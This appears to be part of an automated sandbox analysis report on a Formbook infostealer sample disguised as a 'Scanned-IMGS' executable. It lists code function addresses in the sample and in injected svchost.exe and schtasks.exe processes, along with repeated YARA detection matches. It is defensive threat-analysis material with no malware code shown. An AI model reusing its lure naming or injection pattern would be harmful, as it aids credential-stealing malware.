            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A33190
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A3710E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A21287
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A433C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4F419
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A35680
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A416C4
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A358C0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A478D3
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A41BB8
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A59D05
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A2FE40
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4BFE6
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A41FD0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_01693600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02122A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02122A49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021233E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212109D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021210A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021300E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212E163
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02122EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212FEBB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0212FEC3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0214D6E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021367D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021227D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_021367CE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D03FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D03FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF7D73
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_0322FB3B
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_0322FB40
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03229228
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03229230
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03246A50
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_03229450
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe | Code function: 8_2_032274D0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F402C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F60274
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ECE3F0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F803E6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7A352
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F52000
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F781CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F801AA
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F741A2
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F48158
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EB0100
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F5A118
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EDC6E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EBC7C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC0770
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EE4750
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F6E4F6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F72446
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F64420
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F80591
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC0535
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EBEA80
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F76BD7
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7AB40
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EEE8F0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EA68B8
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ECA840
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC2840
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC29A0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F8A9A6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ED6962
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7EEDB
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7CE93
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ED2E90
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC0E59
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7EE26
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ECCFE0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EB2FC8
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F3EFA0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F34F40
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F62F30
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F02F28
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EE0F30
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EB0CF2
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F60CB5
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC0C00
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EBADE0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ED8DBF
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F5CD1F
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ECAD00
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F612ED
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EDB2C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC52A0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F0739A
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EAD34C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7132D
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7F0E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F770E9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC70C0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F6F0CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02ECB1B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF516C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F8B16B
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EAF172
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F716CC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F05630
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7F7B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EB1460
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7F43F
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F895C3
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F5D5B0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F77571
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F6DAC6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F05AA0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F61AA3
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F5DAAC
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F33A6C
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F77A46
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7FA49
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F35BF0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EFDBF9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EDFB80
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F7FB76
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC38E0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F2D800
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC9950
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EDB950
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02F55910
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EC9EB0
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02E83FD2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02E83FD59_2_02E83FD5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FFB19_2_02F7FFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC1F929_2_02EC1F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FF099_2_02F7FF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FCF29_2_02F7FCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F39C329_2_02F39C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDFDC09_2_02EDFDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F77D739_2_02F77D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC3D409_2_02EC3D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F71D5A9_2_02F71D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C16509_2_026C1650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026DA0809_2_026DA080
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BCA809_2_026BCA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BAB009_2_026BAB00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BC8609_2_026BC860
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BC8589_2_026BC858
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C316B9_2_026C316B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C31709_2_026C3170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBA2E39_2_02CBA2E3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBB0289_2_02CBB028
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBB049_2_02CBBB04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBFBC9_2_02CBBFBC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBC249_2_02CBBC24
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02D75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02DBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02D2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02D87E54 appears 110 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02DAEA12 appears 86 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: String function: 00A27F41 appears 35 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: String function: 00A40D27 appears 70 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: String function: 00A48B40 appears 42 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 02F07E54 appears 110 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 02F2EA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 02EF5130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 02EAB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: String function: 02F3F290 appears 105 times
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1330139056.00000000041FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.00000000040A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
